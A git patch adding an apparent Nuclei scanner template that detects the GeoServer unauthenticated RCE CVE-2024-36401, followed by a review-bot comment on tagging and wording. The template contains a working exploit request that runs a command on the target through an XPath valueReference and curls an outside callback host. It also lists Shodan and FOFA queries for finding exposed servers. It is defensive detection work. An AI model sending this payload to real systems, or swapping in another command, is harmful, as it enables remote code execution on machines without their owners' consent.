From c3dfb8a8a438845a364dae876b1e50577f059cd3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Wed, 3 Jul 2024 14:16:01 +0530
Subject: [PATCH] Create CVE-2024-36401.yaml

---
 http/cves/2024/CVE-2024-36401.yaml | 42 ++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-36401.yaml

diff --git a/http/cves/2024/CVE-2024-36401.yaml b/http/cves/2024/CVE-2024-36401.yaml
new file mode 100644
index 0000000000..d096c52019
--- /dev/null
+++ b/http/cves/2024/CVE-2024-36401.yaml
@@ -0,0 +1,42 @@
+id: CVE-2024-36401
+
+info:
+ name: GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions
+ author: DhiyaneshDk
+ severity: critical
+ description: |
+ In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
+ reference:
+ - https://x.com/sirifu4k1/status/1808270303275241607
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-36401
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: osgeo
+ product: geoserver
+ shodan-query: http.title:"geoserver"
+ fofa-query:
+ - app="geoserver"
+ - title="geoserver"
+ google-query: intitle:"geoserver"
+ tags: cve,cve2024,geoserver,rce,unauth
+
+http:
+ - raw:
+ - |
+ @timeout 20s
+ GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: content_type
+ words:
+ - "application/xml"
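Review bot: The `tags` line does not mark this template as intrusive even though the `raw` request executes a command on the target (the `exec(java.lang.Runtime.getRuntime(),...)` value in `valueReference`), so operators who exclude state-changing templates from a scan would still run it; `tags: cve,cve2024,geoserver,rce,unauth,intrusive` lets them filter it. The `description` names "GeoServer" twice in one clause and could read `GeoServer releases before 2.25.1, 2.24.3 and 2.23.5 evaluate OGC request property names as XPath expressions, allowing unauthenticated remote code execution against a default installation.`, which also makes the fixed-in versions explicit for triage. The `reference` list cites a social-media post and NVD; adding the GeoServer project's own security advisory would give a primary source. The `matchers` pair (a DNS interaction AND an `application/xml` content type) is a sound positive signal, but because it depends on an outbound callback, a non-match on a host with restricted egress is not evidence that the fix is installed.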